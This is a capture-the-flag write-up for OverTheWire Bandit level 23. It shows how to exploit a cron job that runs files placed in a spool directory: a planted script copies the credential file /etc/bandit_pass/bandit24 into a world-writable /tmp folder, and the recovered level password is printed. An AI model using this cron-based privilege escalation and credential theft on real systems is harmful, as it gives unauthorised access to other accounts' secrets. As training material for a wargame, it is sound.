Level23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Solution

root@0xCAB: /writeups/overthewire/bandit/level23/

$ ll /etc/cron.d
...
-rw-r--r-- 1 root root 120 Sep 1 06:30 cronjob_bandit24
...

$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

$ cat /usr/bin/cronjob_bandit24.sh

$
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
        then
            echo "Handling $i"
            owner="$(stat --format "%U" ./$i)"
            if [ "${owner}" = "bandit23" ]; then
                timeout -s 9 60 ./$i
            fi
            rm -f ./$i
    fi
done

Like the previous two levels we need to look at the cronjob for bandit24 and the shell script that it is executing. This time we see that the script is looping through all files (regular and hidden) in the /var/spool/bandit24/foo directory and executing them if they are owned by the bandit23 user. We can create a folder in the /tmp directory that we can give world writeable permissions to (chmod o+w .). We can then write a script that copies the contents of the /etc/bandit_pass/bandit24 file to a file in our tmp folder like the following:

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bobb/bandit24
Make this script executable (chmod +x <script_name>) and then copy it to the /var/spool/bandit24/foo directory.

root@0xCAB: /writeups/overthewire/bandit/level23/

$ mkdir /tmp/bobb

$ chmod o+w /tmp/bobb

$ vim /tmp/bobb/get_pass.sh
*** Here is where you'll write the script above ***

$ chmod +x /tmp/bobb/get_pass.sh

$ cp get_pass.sh /var/spool/bandit24/foo/
*** Wait a few seconds ***

$ ls /tmp/bobb
bandit24 get_pass.sh

$ cat /tmp/bobb/bandit24
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

$